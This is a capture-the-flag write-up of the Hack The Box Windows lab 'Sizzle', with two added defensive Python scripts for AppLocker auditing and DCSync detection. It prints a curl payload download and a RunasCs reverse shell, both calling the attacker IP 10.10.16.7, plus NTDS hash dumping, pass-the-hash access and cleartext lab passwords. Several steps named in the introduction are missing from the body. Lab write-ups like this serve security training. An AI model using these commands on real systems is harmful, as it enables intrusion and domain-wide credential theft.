Sizzle is an insane-difficulty Windows box with an Active Directory environment. A writable directory in an SMB share allows NTLM hashes to be captured; cracking one gives access to the Certificate Services portal. A certificate signed by the domain CA can then be obtained and used for PSRemoting. An SPN associated with a user allows a Kerberoast attack on the box. That user turns out to have replication rights, which can be abused to obtain the Administrator hash via DCSync.
Enumeration
Scope
IP Address: 10.10.10.103
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5986/tcp open wsmans syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p21,53,80,135,139,443,445,3269,5986 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3269/tcp open ssl/ldap
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-27T20:48:39
|_ start_date: 2024-07-26T17:19:10
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
* Open ports: 21,53,80,135,139,443,445,3269,5986
* UDP open ports: 53,88,389
* Services: FTP - DNS - HTTP - HTTPS - RPC - SMB - WinRM - LDAP - Kerberos
* Important notes: Anonymous FTP login allowed - commonName=sizzle.htb.local
Update hosts file with domain name, FQDN and computer name
ldapsearch -H ldap://$ip -x -b "DC=htb,DC=local" sub '*' -D username -W password
<snip>
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v3839
ZZ_ARCHIVE holds several files, and Users holds one folder per user.
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls ZZ_ARCHIVE
AddComplete.pptx LimitInstall.doc 'anony-(externalcell).xlsx' test.doc
AddMerge.ram LimitStep.ppt 'anony-(frameset).docx' test.gif
<snip>
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls Users
Public amanda amanda_adm bill bob chris henry joe jose lkys37en morgan mrb3n
I will try to write a file into each directory to see whether I have write access to any of them.
Although the credentials are valid, I can't access the machine over WinRM.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec winrm $ip -u amanda -p 'Ashare1972'
HTTP 10.10.10.103 5986 SIZZLE [*] https://10.10.10.103:5986/wsman
WINRM 10.10.10.103 5986 SIZZLE [-] HTB.LOCAL\amanda:Ashare1972 "The server did not response with one of the following authentication methods Negotiate, Kerberos, NTLM - actual: ''"
I will continue to enumerate the machine with these credentials including
When viewing the share contents, I find some interesting files.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -U amanda "\\\\$ip\CertEnroll"
smb: \> ls
. D 0 Sat Jul 27 13:19:47 2024
.. D 0 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA+.crl A 721 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA.crl A 909 Fri Jul 26 13:19:32 2024
nsrev_HTB-SIZZLE-CA.asp A 322 Mon Jul 2 16:36:05 2018
sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Mon Jul 2 16:36:03 2018
Download them all
smb: \> mget *
Get file HTB-SIZZLE-CA+.crl? y
Get file HTB-SIZZLE-CA.crl? y
Get file nsrev_HTB-SIZZLE-CA.asp? y
Get file sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt? y
I will mark share enumeration as done in my notes, collect data with bloodhound.py for further enumeration, and then go to the /certsrv page.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ bloodhound-python -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local -c all --zip
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (sizzle.HTB.LOCAL:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 20S
INFO: Compressing output into 20240727180002_bloodhound.zip
I uploaded the zip file to BloodHound and went to /certsrv.
After authenticating to the web app, I land on this page.
I will click on Request a Certificate.
Then click on advanced certificate request.
It asks for a certificate signing request (.csr), which must be signed with a private key. I don't have one, so I will generate a private key and sign a .csr with it.
To log in to the machine, I need a certificate signed by the domain's Certificate Authority (CA) along with the private key that signed the certificate signing request.
Also, after querying the AppLocker policy, I found that I can run programs from the tmp folder.
*Evil-WinRM* PS C:\Users\amanda> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollection
<snip>
PathConditions : {%OSDRIVE%\tmp\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : d754b869-d2cc-46af-9c94-6b6e8c10d095
Name : All files located in the Program Files folder
Description : Allows members of the Everyone group to run applications that are located in the Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow
<snip>
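To see why that rule matters from the defender's side, here is an added Python audit (not from the original writeup) that parses Get-AppLockerPolicy rule output like the block above and flags Allow rules whose path conditions fall outside the roots that standard users cannot write to; the sample policy text, its rule Ids, and the trusted-root list are constructed assumptions.

```python
import re

# Roots that standard users cannot write to; an Allow rule is expected there.
# The trusted-root list is an assumption for this example.
TRUSTED_ROOTS = ("%PROGRAMFILES%\\", "%WINDIR%\\")

# Constructed sample modelled on the Get-AppLockerPolicy output above
# (rule Ids are made up, not the box's real ones).
SAMPLE_POLICY = r"""
PathConditions   : {%OSDRIVE%\tmp\*}
PathExceptions   : {}
Id               : 00000000-0000-0000-0000-000000000001
Name             : All files located in the Program Files folder
UserOrGroupSid   : S-1-1-0
Action           : Allow

PathConditions   : {%PROGRAMFILES%\*}
PathExceptions   : {}
Id               : 00000000-0000-0000-0000-000000000002
Name             : All files located in the Program Files folder
UserOrGroupSid   : S-1-1-0
Action           : Allow
"""


def parse_rules(text):
    """Split 'Key : Value' blocks (one per rule, blank-line separated) into dicts."""
    rules = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rule = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            rule[key.strip()] = value.strip()
        rules.append(rule)
    return rules


def braces(value):
    """'{a, b}' -> ['a', 'b']; '{}' -> []."""
    return [p.strip() for p in value.strip("{}").split(",") if p.strip()]


def weak_allow_rules(text):
    """Allow rules whose path condition is not under a trusted root."""
    # The rule name is ignored on purpose: on the box the rule named after
    # Program Files actually allowed %OSDRIVE%\tmp\*, which any user can fill.
    weak = []
    for rule in parse_rules(text):
        if rule.get("Action") != "Allow":
            continue
        for path in braces(rule.get("PathConditions", "{}")):
            if not path.upper().startswith(TRUSTED_ROOTS):
                weak.append({"id": rule.get("Id"), "name": rule.get("Name"),
                             "sid": rule.get("UserOrGroupSid"), "path": path})
    return weak
```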
I will then upload RunasCs.exe to the machine to get a shell as mrlky.
*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/RunasCs.exe -o .\RunasCs.exe
*Evil-WinRM* PS C:\Windows\Temp> .\RunasCs.exe mrlky 'Footxxxxxx' PowerShell -r 10.10.16.7:443
Enter PEM pass phrase:
[*] Warning: The logon for user 'mrlky' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2e2163$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2888 created in background.
Receive the connection with nc.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.103] 55772
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
htb\mrlky
Get user flag
PS C:\Users\mrlky> type Desktop\user.txt
b31ca0c7a5bcc77a55xxxxxxxxxxxxxx
User Flag: b31ca0c7a5bcc77a55xxxxxxxxxxxxxx
Shell as Administrator
From BloodHound, the user mrlky has DCSync rights, so I can take over the domain by dumping the NTDS database.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u mrlky -p 'Footbxxxxx' --ntds --user administrator
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
SMB 10.10.10.103 445 SIZZLE Node MRLKY@HTB.LOCAL successfully set as owned in BloodHound
SMB 10.10.10.103 445 SIZZLE [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.103 445 SIZZLE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.103 445 SIZZLE Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::
Or with secretsdump.py:
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-secretsdump htb.local/mrlky@$ip -just-dc-user administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::
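On the defender's side, the DRSUAPI replication that nxc and secretsdump perform above is logged on the domain controller as Security Event ID 4662 with the replication control-access GUIDs in the Properties field. The following Python is an added example, not part of the original writeup: it runs that check over constructed 4662 records and flags replication requests whose subject is not a machine account; the sample events and the simple '$'-suffix test for DC accounts are assumptions.

```python
import re

# Control-access right GUIDs exercised by DRSUAPI replication (the method
# secretsdump reports above). A principal that is not a domain controller
# asking for them is the classic DCSync signal.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed Security Event ID 4662 records flattened to key=value pairs
# (sample data for this example, not logs taken from the box).
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=SIZZLE$ SubjectDomainName=HTB ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=mrlky SubjectDomainName=HTB ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=amanda SubjectDomainName=HTB ObjectType=user "
    "Properties={aaaaaaaa-0000-0000-0000-000000000001}",  # made-up non-replication GUID
    "EventID=4624 SubjectUserName=mrlky SubjectDomainName=HTB LogonType=3",
]


def parse_event(line):
    """'k=v k=v ...' -> dict; a value runs until the next ' key=' token."""
    return dict(re.findall(r"(\w+)=(.*?)(?= \w+=|$)", line))


def is_dc_account(name):
    # Assumption: machine accounts end in '$'. In production compare against
    # the actual list of DC computer accounts instead of this suffix test.
    return name.endswith("$")


def detect_dcsync(lines):
    """Return (subject, [rights]) for 4662 events in which a non-DC principal
    exercised replication rights on the directory."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = set(re.findall(r"\{([0-9a-f-]{36})\}", ev.get("Properties", "").lower()))
        rights = sorted(REPLICATION_GUIDS[g] for g in guids & set(REPLICATION_GUIDS))
        if rights and not is_dc_account(ev.get("SubjectUserName", "")):
            hits.append((ev["SubjectUserName"], rights))
    return hits


if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspect: {subject} requested {', '.join(rights)}")
```

The DC's own machine account replicating is normal; the hit here is the user account exercising Get-Changes-All, which is exactly what the NTDS dump above needed.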
Access the machine with psexec.py
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :f6b7160bfc91823792xxxxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file APWgGeJS.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service Kabl on 10.10.10.103.....
[*] Starting service Kabl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Get the administrator flag
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\administrator\Desktop> type root.txt
c3d8011c9688feccaxxxxxxxxxxxxxxx